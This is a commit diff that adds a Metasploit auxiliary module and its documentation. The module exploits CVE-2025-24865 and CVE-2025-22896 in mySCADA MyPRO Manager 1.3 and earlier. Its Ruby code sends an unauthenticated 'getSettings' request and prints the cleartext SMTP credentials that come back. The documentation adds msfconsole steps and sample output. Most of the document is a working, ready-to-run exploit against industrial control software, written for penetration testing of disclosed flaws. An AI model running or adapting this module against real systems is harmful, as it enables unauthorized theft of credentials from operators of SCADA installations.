Land #19878, MyScada MyPro Manager Credential Harverster Module

msutovsky-r7 · web-flow · commit 576ff2fb5cb0 · 2025-02-25T11:35:59.000+01:00
mySCADA MyPRO Manager Credential Harvester (CVE-2025-24865 & CVE-2025-22896) Module
diff --git a/documentation/modules/auxiliary/admin/scada/mypro_mgr_creds.md b/documentation/modules/auxiliary/admin/scada/mypro_mgr_creds.md
@@ -0,0 +1,64 @@
+## Vulnerable Application
+
+**Vulnerability Description**
+
+This module exploits two vulnerabilities (CVE-2025-24865 & CVE-2025-22896) in mySCADA MyPRO Manager <= v1.3 to retrieve the configured
+credentials for the mail server.
+
+The administrative web interface has certain features where credentials are required to be accessed, but the implementation is flawed,
+allowing to bypass the requirement. Other important administrative features do not require credentials at all, allowing an unauthenticated
+remote attacker to perform privileged actions. These issues are tracked through CVE-2025-24865.
+Another vulnerability, tracked through CVE-2025-22896, is related to the cleartext storage of various credentials by the application.
+
+One way how these issues can be exploited is to allow an unauthenticated remote attacker to retrieve the cleartext credentials of the mail
+server that is configured by the product, which this module does.
+
+Versions <= 1.3 are affected. CISA published [ICSA-25-044-16](https://www.cisa.gov/news-events/ics-advisories/icsa-25-044-16) to cover
+the security issues.
+
+**Vulnerable Application Installation**
+
+A trial version of the software can be obtained from [the vendor](https://www.myscada.org/mypro/).
+
+**Successfully tested on**
+
+- mySCADA MyPRO Manager 1.3 on Windows 11 (22H2)
+
+## Verification Steps
+
+1. Install the application
+2. After installation, reboot the system and wait some time until a runtime (e.g., 9.2.1) has been fetched and installed.
+3. Start `msfconsole` and run the following commands:
+
+```
+msf6 > use auxiliary/admin/scada/mypro_mgr_creds 
+msf6 auxiliary(admin/scada/mypro_mgr_creds) > set RHOSTS <IP>
+msf6 auxiliary(admin/scada/mypro_mgr_creds) > run 
+```
+
+## Scenarios
+
+Running the module against MyPRO Manager v1.3 on Windows 11, should result in an output similar to the
+following:
+
+```
+msf6 auxiliary(admin/scada/mypro_mgr_creds) > run
+[*] Running module against 192.168.1.78
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[+] Mail server credentials retrieved:
+[+] Host: smtp.example.com
+[+] Port: 993
+[+] Auth Type: login
+[+] User: user
+[+] Password: SuperS3cr3t!
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/scada/mypro_mgr_creds) > creds
+Credentials
+===========
+
+host          origin        service           public  private       realm  private_type  JtR Format  cracked_password
+----          ------        -------           ------  -------       -----  ------------  ----------  ----------------
+192.168.1.78  192.168.1.78  34022/tcp (http)  user    SuperS3cr3t!         Password
+```
diff --git a/modules/auxiliary/admin/scada/mypro_mgr_creds.rb b/modules/auxiliary/admin/scada/mypro_mgr_creds.rb
@@ -0,0 +1,120 @@
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+  CheckCode = Exploit::CheckCode
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'mySCADA myPRO Manager Credential Harvester (CVE-2025-24865 and CVE-2025-22896)',
+        'Description' => %q{
+          Credential Harvester in MyPRO Manager <= v1.3 from mySCADA.
+          The product suffers from a broken authentication vulnerability (CVE-2025-24865) for certain functions. One of them is the configuration page for notifications, which returns the cleartext credentials (CVE-2025-22896) before correctly veryfing that the associated request is coming from an authenticated and authorized entity.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => ['Michael Heinzl'], # Vulnerability discovery & MSF module
+        'References' => [
+          [ 'URL', 'https://www.cisa.gov/news-events/ics-advisories/icsa-25-044-16'],
+          [ 'CVE', '2025-24865'],
+          [ 'CVE', '2025-22896']
+        ],
+        'DisclosureDate' => '2025-02-13',
+        'DefaultOptions' => {
+          'RPORT' => 34022,
+          'SSL' => 'False'
+        },
+        'Platform' => 'win',
+        'Arch' => [ ARCH_CMD ],
+        'Targets' => [
+          [
+            'Windows_Fetch',
+            {
+              'Arch' => [ ARCH_CMD ],
+              'Platform' => 'win',
+              'DefaultOptions' => { 'FETCH_COMMAND' => 'CURL' },
+              'Type' => :win_fetch
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new(
+          'TARGETURI',
+          [ true, 'The URI for the MyPRO Manager web interface', '/' ]
+        )
+      ]
+    )
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'assets/index-DBkpc6FO.js')
+      })
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
+      return CheckCode::Unknown
+    end
+
+    if res.to_s =~ /const S="([^"]+)"/
+      version = ::Regexp.last_match(1)
+      vprint_status('Version retrieved: ' + version)
+      if Rex::Version.new(version) <= Rex::Version.new('1.3')
+        return CheckCode::Appears
+      end
+
+      return CheckCode::Safe
+    end
+    return CheckCode::Unknown
+  end
+
+  def run
+    post_data = {
+      'command' => 'getSettings'
+    }
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'data' => JSON.generate(post_data),
+      'uri' => normalize_uri(target_uri.path, 'get')
+    })
+
+    fail_with(Failure::Unknown, 'No response from server.') if res.nil?
+    fail_with(Failure::UnexpectedReply, 'Non-200 returned from server.') if res.code != 200
+    print_good('Mail server credentials retrieved:')
+    data = res.get_json_document
+
+    if data.key?('smtp') && data['smtp'].is_a?(Hash)
+      smtp_info = data['smtp']
+
+      host = smtp_info.fetch('host', 'Unknown Host')
+      port = smtp_info.fetch('port', 'Unknown Port')
+      auth = smtp_info.fetch('auth', 'Unknown Auth')
+      user = smtp_info.fetch('user', 'Unknown User')
+      passw = smtp_info.fetch('pass', 'Unknown Password')
+
+      print_good("Host: #{host}")
+      print_good("Port: #{port}")
+      print_good("Auth Type: #{auth}")
+      print_good("User: #{user}")
+      print_good("Password: #{passw}")
+
+      unless user == 'Unknown User' || passw == 'Unknown Password'
+        store_valid_credential(user: user, private: passw, proof: data.to_s)
+      end
+    end
+  end
+
+end
